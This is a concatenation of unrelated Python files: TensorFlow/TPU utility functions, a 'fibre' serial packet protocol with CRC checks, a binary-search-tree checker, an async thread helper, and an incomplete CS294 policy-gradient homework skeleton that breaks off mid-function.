def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: the `Operation` object for a VarHandleOp.
Raises:
TypeError: if var_op is not a VarHandleOp.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type != 'VarHandleOp':
raise TypeError('var_op should be a VarHandleOp, got %s' % str(var_op.type))
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
_TPU_SUMMARY_TENSORS_KEY = ('__lingvo_tpu_summary_tensors')
_get_tpu_summary_tensors = _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY,
lambda: [])
def AddTpuSummaryTensor(name, value, weight=1.0):
"""Adds tensor to global collection of summaries.
This needs to be used in situations where tf.summary() could be used but
currently tf.summary is not supported. Use py_utils.AddTpuSummaryTensor() in
low level code to add summary tensors to global collection of summaries.
Then recover all summary tensors from global collection by calling
py_utils.GetTpuSummaryTensors() from top level code (for example from
ComputeLoss method of BaseTask).
In addition to 'name' argument, current tensorflow name scope is also
captured and added to the metric name. This way for example summaries from
a repeated layer will appear as separate graphs in the tensorboard.
Weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss for
the exact definition of weight for eval metrics.
Args:
name: metric name
value: metric value tensor
weight: weight tensor for weighted metrics
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
x = NestedMap()
x.name = name
x.value = value, tf.convert_to_tensor(weight)
x.name_scope = tf.get_default_graph().get_name_scope()
tpu_summary_tensors.append(x)
def GetTpuSummaryTensors():
"""Returns summary tensors from global collection.
Returns:
A dict containing str keys and (metric, weight) pairs as values
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
return {
'%s/%s' % (x.name, SanitizeScopeKey(x.name_scope)): x.value
for x in tpu_summary_tensors
}
def ClearTpuSummaryTensors():
tpu_summary_tensors = _get_tpu_summary_tensors()
del tpu_summary_tensors[:]
def ComputationShape(split_size, topology=None):
"""Decides the computation shape based on the split_size.
Args:
split_size: number of accelerators to use per split.
topology: a serialized string of `tensorflow.tpu.TopologyProto`, or a
`tf.tpu.experimental.Topology` object, that describes the TPU cluster
topology. If not set, it'll use a default setting based on split_size.
Returns:
A 4-element list that describes the computation shape.
"""
if topology:
if isinstance(topology, tf.tpu.experimental.Topology):
topology_info = topology
else:
topology_info = tf_topology.Topology(serialized=topology)
computation_shape = None
if topology and functools.reduce(lambda a, b: a * b,
topology_info.mesh_shape) == split_size:
computation_shape = topology_info.mesh_shape
elif split_size == 1:
computation_shape = [1, 1, 1, 1]
elif topology and topology_info.mesh_shape[
-1] == 1 and split_size in topology_info.mesh_shape:
# For Megacore, if we find exact match on mesh shape, map split_size to it
computation_shape = [1, 1, 1, 1]
computation_shape[topology_info.mesh_shape.tolist().index(
split_size)] = split_size
else:
if topology:
cores_per_chip = topology_info.mesh_shape[-1]
else:
cores_per_chip = 2
assert split_size % cores_per_chip == 0
split_chips = split_size // cores_per_chip
if split_chips == 1:
computation_shape = [1, 1, 1, cores_per_chip]
elif split_chips == 2:
computation_shape = [1, 2, 1, cores_per_chip]
elif split_chips == 4:
computation_shape = [2, 2, 1, cores_per_chip]
elif split_chips == 8:
computation_shape = [4, 2, 1, cores_per_chip]
elif split_chips == 16:
computation_shape = [4, 4, 1, cores_per_chip]
elif split_chips == 32:
if topology and topology_info.mesh_shape[1] == 32:
# Fwd within-replica all-reduces is performed along column;
# Bwd gradient cross-replica all-reduces is performed along row.
# This currently has better performance than the strided patten.
computation_shape = [1, 32, 1, cores_per_chip]
else:
computation_shape = [4, 8, 1, cores_per_chip]
elif split_chips == 64:
computation_shape = [8, 8, 1, cores_per_chip]
elif split_chips == 128:
computation_shape = [8, 16, 1, cores_per_chip]
elif split_chips == 256:
computation_shape = [16, 16, 1, cores_per_chip]
elif split_chips == 512:
computation_shape = [16, 32, 1, cores_per_chip]
elif split_chips == 1024:
computation_shape = [32, 32, 1, cores_per_chip]
elif split_chips == 2048:
computation_shape = [64, 32, 1, cores_per_chip]
elif split_chips == 4096:
computation_shape = [128, 32, 1, cores_per_chip]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
def GetExtraVars():
"""Returns the captured variables by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.variable_captures
return function.get_extra_vars()
def GetExtraInputs():
"""Returns the captured input tensors by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.external_captures
return function.get_extra_inputs()
def GetExtraArgs():
"""Returns the corresponding function arguments for the captured inputs."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.internal_captures
return function.get_extra_args()
def ShardedFilePatternToGlob(file_pattern):
"""Converts a file pattern path@shards to path-?????-of-shards."""
if ',' in file_pattern:
raise ValueError(
'ShardedFilePatternToGlob does not support multiple file patterns.')
if '@' not in file_pattern:
return file_pattern
path, shards = file_pattern.split('@')
if shards == '*':
return f'{path}-?????-of-*'
return f'{path}-?????-of-{int(shards):05}'
def ComputeNceAndAuc(probs, targets, mask):
"""Compute normalized cross entropy and AUC of the PR curve for a batch.
Args:
probs: a tensor of shape [batch, time].
targets: a tensor of shape [batch, time], where each element is either 0 or
1 indicating wrong or correct.
mask: a tensor of shape [batch, time], a mask for hyp sequence.
Returns:
nce: a tensor of shape [1], the normalized cross entropy value.
auc: a tensor of shape [1], the AUC value.
"""
def LogWithClip(tensor, clip_value_min=1e-8):
"""Clip all elements of a tensor to a minimum before taking log."""
return tf.math.log(tf.clip_by_value(tensor, clip_value_min, 1.0))
bce = -targets * LogWithClip(probs) - (1 - targets) * LogWithClip(1 - probs)
num_cor = tf.reduce_sum(targets * mask)
num_tokens = tf.reduce_sum(mask)
wcr = num_cor / num_tokens
entropy = -wcr * LogWithClip(wcr) - (1 - wcr) * LogWithClip(1 - wcr)
avg_conditional_entropy = tf.reduce_mean(tf.boolean_mask(bce, mask))
nce = (entropy - avg_conditional_entropy) / entropy
auc = tf.metrics.auc(targets, probs, mask, curve='PR')[1]
return nce, auc
def GatherTensorValuesBySeqIndices(tensor, class_indices, keepdims=False):
"""Gather values from a 3d tensor according to sequences of indices.
Args:
tensor: a 3d tensor of [dim0, dim1, num_class], e.g. output from softmax.
class_indices: a 2d tensor of [dim0, dim1], where the second dim is a
sequence of class indices between 0 to num_class - 1, inclusive.
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
A tensor ret of [dim0, dim1], where
ret[b, t] = tensor[b, t, indices[b, t]].
If keepdims is True, then ret has shape [dim0, dim1, 1].
"""
tensor = HasRank(tensor, 3)
class_indices = HasRank(class_indices, 2)
tensor = HasShape(tensor, GetShape(class_indices), 2)
dim0 = GetShape(class_indices)[0]
dim1 = GetShape(class_indices)[1]
dim0_indices = tf.tile(tf.expand_dims(tf.range(dim0), axis=-1), [1, dim1])
dim1_indices = tf.tile(tf.expand_dims(tf.range(dim1), axis=0), [dim0, 1])
gather_indices = tf.stack([
tf.cast(dim0_indices, dtype=class_indices.dtype),
tf.cast(dim1_indices, dtype=class_indices.dtype), class_indices
],
axis=-1)
ret = tf.gather_nd(tensor, gather_indices)
if keepdims:
ret = tf.expand_dims(ret, axis=-1)
return ret
def GetSoftmaxProbsBySeqIndices(logits, indices, keepdims=False):
"""Get softmax probabilities from index sequences given logits sequences.
Args:
logits: a tensor of [batch, time, num_class] or [time, batch, num_class].
indices: a tensor of [batch, time] or [time, batch].
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
a tensor of [batch, time] or [time, batch] for the corresponding softmax
probabilities. If keepdims is True, returned tensor has a third dimension
of size 1.
"""
probs = tf.nn.softmax(logits)
return GatherTensorValuesBySeqIndices(probs, indices, keepdims)
def DivideNoNan(x, y):
"""Equivalent to tf.math.divide_no_nan but supports bfloat16."""
safe_y = tf.where(tf.equal(y, 0.), tf.ones_like(y), y)
return tf.where(tf.equal(y, 0.0), tf.zeros_like(x), x / safe_y)
def SequencePaddings(seqlen, maxlen=None):
mask = tf.sequence_mask(seqlen, maxlen, dtype=tf.float32)
return 1 - mask
def AppendDims(x, ndims):
return tf.reshape(x, GetShape(x) + [1] * ndims)
def MaybeSoftCapLogits(x, cap=0.0):
"""Caps logits x to be within a certain range.
Args:
x: A float tensor, the logit values to be capped.
cap: a float, the limit to cap x within. If cap <= 0.0, x is not capped.
Returns:
logits after capping.
"""
if cap <= 0.0:
return x
else:
return cap * tf.math.tanh(x / cap)
def GetTpuEmbeddingGraphCollection():
"""Return the graph collection that stores the TpuEmbeddingCollection."""
tpu_emb_graph_collection = tf.get_collection_ref('__tpu_embedding_collection')
assert len(tpu_emb_graph_collection) <= 1
return tpu_emb_graph_collection
|
protocol.py | # See protocol.hpp for an overview of the protocol
import time
import struct
import sys
import threading
import traceback
#import fibre.utils
from fibre.utils import Event, wait_any, TimeoutError
import abc
if sys.version_info >= (3, 4):
ABC = abc.ABC
else:
ABC = abc.ABCMeta('ABC', (), {})
if sys.version_info < (3, 3):
from monotonic import monotonic
time.monotonic = monotonic
SYNC_BYTE = 0xAA
CRC8_INIT = 0x42
CRC16_INIT = 0x1337
PROTOCOL_VERSION = 1
CRC8_DEFAULT = 0x37 # this must match the polynomial in the C++ implementation
CRC16_DEFAULT = 0x3d65 # this must match the polynomial in the C++ implementation
MAX_PACKET_SIZE = 128
def calc_crc(remainder, value, polynomial, bitwidth):
topbit = (1 << (bitwidth - 1))
# Bring the next byte into the remainder.
remainder ^= (value << (bitwidth - 8))
for bitnumber in range(0,8):
if (remainder & topbit):
remainder = (remainder << 1) ^ polynomial
else:
remainder = (remainder << 1)
return remainder & ((1 << bitwidth) - 1)
def calc_crc8(remainder, value):
if isinstance(value, bytearray) or isinstance(value, bytes) or isinstance(value, list):
for byte in value:
if not isinstance(byte,int):
byte = ord(byte)
remainder = calc_crc(remainder, byte, CRC8_DEFAULT, 8)
else:
remainder = calc_crc(remainder, byte, CRC8_DEFAULT, 8)
return remainder
def calc_crc16(remainder, value):
if isinstance(value, bytearray) or isinstance(value, bytes) or isinstance(value, list):
for byte in value:
if not isinstance(byte, int):
byte = ord(byte)
remainder = calc_crc(remainder, byte, CRC16_DEFAULT, 16)
else:
remainder = calc_crc(remainder, value, CRC16_DEFAULT, 16)
return remainder
# Can be verified with http://www.sunshine2k.de/coding/javascript/crc/crc_js.html:
#print(hex(calc_crc8(0x12, [1, 2, 3, 4, 5, 0x10, 0x13, 0x37])))
#print(hex(calc_crc16(0xfeef, [1, 2, 3, 4, 5, 0x10, 0x13, 0x37])))
class DeviceInitException(Exception):
pass
class ChannelDamagedException(Exception):
"""
Raised when the channel is temporarily broken and a
resend of the message might be successful
"""
pass
class ChannelBrokenException(Exception):
"""
Raised when the channel is permanently broken
"""
pass
class StreamSource(ABC):
@abc.abstractmethod
def get_bytes(self, n_bytes, deadline):
pass
class StreamSink(ABC):
@abc.abstractmethod
def process_bytes(self, bytes):
pass
class PacketSource(ABC):
@abc.abstractmethod
def get_packet(self, deadline):
pass
class PacketSink(ABC):
@abc.abstractmethod
def process_packet(self, packet):
pass
class StreamToPacketSegmenter(StreamSink):
def __init__(self, output):
self._header = []
self._packet = []
self._packet_length = 0
self._output = output
def process_bytes(self, bytes):
"""
Processes an arbitrary number of bytes. If one or more full packets are
are received, they are sent to this instance's output PacketSink.
Incomplete packets are buffered between subsequent calls to this function.
"""
for byte in bytes:
if (len(self._header) < 3):
# Process header byte
self._header.append(byte)
if (len(self._header) == 1) and (self._header[0] != SYNC_BYTE):
self._header = []
elif (len(self._header) == 2) and (self._header[1] & 0x80):
self._header = [] # TODO: support packets larger than 128 bytes
elif (len(self._header) == 3) and calc_crc8(CRC8_INIT, self._header):
self._header = []
elif (len(self._header) == 3):
self._packet_length = self._header[1] + 2
else:
# Process payload byte
self._packet.append(byte)
# If both header and packet are fully received, hand it on to the packet processor
if (len(self._header) == 3) and (len(self._packet) == self._packet_length):
if calc_crc16(CRC16_INIT, self._packet) == 0:
self._output.process_packet(self._packet[:-2])
self._header = []
self._packet = []
self._packet_length = 0
class StreamBasedPacketSink(PacketSink):
def __init__(self, output):
self._output = output
def process_packet(self, packet):
if (len(packet) >= MAX_PACKET_SIZE):
raise NotImplementedError("packet larger than 127 currently not supported")
header = bytearray()
header.append(SYNC_BYTE)
header.append(len(packet))
header.append(calc_crc8(CRC8_INIT, header))
self._output.process_bytes(header)
self._output.process_bytes(packet)
# append CRC in big endian
crc16 = calc_crc16(CRC16_INIT, packet)
self._output.process_bytes(struct.pack('>H', crc16))
class PacketFromStreamConverter(PacketSource):
def __init__(self, input):
self._input = input
def get_packet(self, deadline):
"""
Requests bytes from the underlying input stream until a full packet is
received or the deadline is reached, in which case None is returned. A
deadline before the current time corresponds to non-blocking mode.
"""
while True:
header = bytes()
# TODO: sometimes this call hangs, even though the device apparently sent something
header = header + self._input.get_bytes_or_fail(1, deadline)
if (header[0] != SYNC_BYTE):
#print("sync byte mismatch")
continue
header = header + self._input.get_bytes_or_fail(1, deadline)
if (header[1] & 0x80):
#print("packet too large")
continue # TODO: support packets larger than 128 bytes
header = header + self._input.get_bytes_or_fail(1, deadline)
if calc_crc8(CRC8_INIT, header) != 0:
#print("crc8 mismatch")
continue
packet_length = header[1] + 2
#print("wait for {} bytes".format(packet_length))
packet = self._input.get_bytes_or_fail(packet_length, deadline)
if calc_crc16(CRC16_INIT, packet) != 0:
#print("crc16 mismatch")
continue
return packet[:-2]
class Channel(PacketSink):
# Choose these parameters to be sensible for a specific transport layer
_resend_timeout = 5.0 # [s]
_send_attempts = 5
def __init__(self, name, input, output, cancellation_token, logger):
"""
Params:
input: A PacketSource where this channel will source packets from on
demand. Alternatively packets can be provided to this channel
directly by calling process_packet on this instance.
output: A PacketSink where this channel will put outgoing packets.
"""
self._name = name
self._input = input
self._output = output
self._logger = logger
self._outbound_seq_no = 0
self._interface_definition_crc = 0
self._expected_acks = {}
self._responses = {}
self._my_lock = threading.Lock()
self._channel_broken = Event(cancellation_token)
self.start_receiver_thread(Event(self._channel_broken))
def start_receiver_thread(self, cancellation_token):
"""
Starts the receiver thread that processes incoming messages.
The thread quits as soon as the channel enters a broken state.
"""
def receiver_thread():
error_ctr = 0
try:
while (not cancellation_token.is_set() and not self._channel_broken.is_set()
and error_ctr < 10):
# Set an arbitrary deadline because the get_packet function
# currently doesn't support a cancellation_token
deadline = time.monotonic() + 1.0
try:
response = self._input.get_packet(deadline)
except TimeoutError:
continue # try again
except ChannelDamagedException:
error_ctr += 1
continue # try again
if (error_ctr > 0):
error_ctr -= 1
# Process response
# This should not throw an exception, otherwise the channel breaks
self.process_packet(response)
#print("receiver thread is exiting")
except Exception:
self._logger.debug("receiver thread is exiting: " + traceback.format_exc())
finally:
self._channel_broken.set()
t = threading.Thread(target=receiver_thread)
t.daemon = True
t.start()
def remote_endpoint_operation(self, endpoint_id, input, expect_ack, output_length):
if input is None:
input = bytearray(0)
if (len(input) >= 128):
raise Exception("packet larger than 127 currently not supported")
if (expect_ack):
endpoint_id |= 0x8000
self._my_lock.acquire()
try:
self._outbound_seq_no = ((self._outbound_seq_no + 1) & 0x7fff)
seq_no = self._outbound_seq_no
finally:
self._my_lock.release()
seq_no |= 0x80 # FIXME: we hardwire one bit of the seq-no to 1 to avoid conflicts with the ascii protocol
packet = struct.pack('<HHH', seq_no, endpoint_id, output_length)
packet = packet + input
crc16 = calc_crc16(CRC16_INIT, packet)
if (endpoint_id & 0x7fff == 0):
trailer = PROTOCOL_VERSION
else:
trailer = self._interface_definition_crc
#print("append trailer " + trailer)
packet = packet + struct.pack('<H', trailer)
if (expect_ack):
ack_event = Event()
self._expected_acks[seq_no] = ack_event
try:
attempt = 0
while (attempt < self._send_attempts):
self._my_lock.acquire()
try:
self._output.process_packet(packet)
except ChannelDamagedException:
attempt += 1
continue # resend
except TimeoutError:
attempt += 1
continue # resend
finally:
self._my_lock.release()
# Wait for ACK until the resend timeout is exceeded
try:
if wait_any(self._resend_timeout, ack_event, self._channel_broken) != 0:
raise ChannelBrokenException()
except TimeoutError:
attempt += 1
continue # resend
return self._responses.pop(seq_no)
# TODO: record channel statistics
raise ChannelBrokenException() # Too many resend attempts
finally:
self._expected_acks.pop(seq_no)
self._responses.pop(seq_no, None)
else:
# fire and forget
self._output.process_packet(packet)
return None
def remote_endpoint_read_buffer(self, endpoint_id):
"""
Handles reads from long endpoints
"""
# TODO: handle device that could (maliciously) send infinite stream
buffer = bytes()
while True:
chunk_length = 512
chunk = self.remote_endpoint_operation(endpoint_id, struct.pack("<I", len(buffer)), True, chunk_length)
if (len(chunk) == 0):
break
buffer += chunk
return buffer
def process_packet(self, packet):
#print("process packet")
packet = bytes(packet)
if (len(packet) < 2):
raise Exception("packet too short")
seq_no = struct.unpack('<H', packet[0:2])[0]
if (seq_no & 0x8000):
seq_no &= 0x7fff
ack_signal = self._expected_acks.get(seq_no, None)
if (ack_signal):
self._responses[seq_no] = packet[2:]
ack_signal.set()
#print("received ack for packet " + str(seq_no))
else:
print("received unexpected ACK: " + str(seq_no))
else:
#if (calc_crc16(CRC16_INIT, struct.pack('<HBB', PROTOCOL_VERSION, packet[-2], packet[-1]))):
# raise Exception("CRC16 mismatch")
print("endpoint requested")
# TODO: handle local endpoint operation
|
is_bst.py | #!/usr/bin/python3
import sys, threading
sys.setrecursionlimit(10**9) # max depth of recursion
threading.stack_size(2**30) # new thread will get stack of such size
result=[]
def inordertraversal(tree, root=0):
if root ==-1: return
inordertraversal(tree, tree[root][1])
result.append(tree[root][0])
inordertraversal(tree, tree[root][2])
def IsBinarySearchTree(tree):
# Implement correct algorithm here
if len(tree)==0: return True
inordertraversal(tree)
for i in range(len(result)-1):
if result[i+1]<result[i]: return False
return True
def main():
nodes = int(input().strip())
tree = []
for i in range(nodes):
tree.append(list(map(int, input().strip().split())))
if IsBinarySearchTree(tree):
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
|
utils.py | import asyncio
import atexit
import logging
import threading
from functools import partial, wraps
from typing import List
_NO_ASYNC = "WHYLOGS_NO_ASYNC"
_logger = logging.getLogger(__name__)
_threads: List[threading.Thread] = []
def _do_wrap(func):
@wraps(func)
async def run(*args, loop=None, executor=None, **kwargs):
if loop is None:
loop = asyncio.get_event_loop()
pfunc = partial(func, *args, **kwargs)
return await loop.run_in_executor(executor, pfunc)
return run
def async_wrap(func, *args, **kwargs):
"""
Args:
func: the coroutine to run in an asyncio loop
Returns:
threading.Thread: an thread for the coroutine
"""
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.start()
_threads.append(thread)
return thread
@atexit.register
def _wait_for_children():
"""
Wait for the child process to complete. This is to ensure that we write out the log files before the parent
process finishes
"""
for t in _threads:
try:
t.join()
except: # noqa
_logger.exception("Failed to await task")
|
train_pg_f18.py | """
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
import torch
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR CODE HERE
raise NotImplementedError
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
raise NotImplementedError
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
sy_adv_n = None
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
raise NotImplementedError
if self.discrete:
# YOUR_CODE_HERE
sy_logits_na = None
return sy_logits_na
else:
# YOUR_CODE_HERE
sy_mean = None
sy_logstd = None
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
raise NotImplementedError
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = None
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = None
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
raise NotImplementedError
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_logprob_n = None
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
sy_logprob_n = None
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
loss = None # YOUR CODE HERE
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
raise NotImplementedError
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
self.sy_target_n = None
baseline_loss = None
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
raise NotImplementedError
ac = None # YOUR CODE HERE
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
if self.reward_to_go:
raise NotImplementedError
else:
raise NotImplementedError
return q_n
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
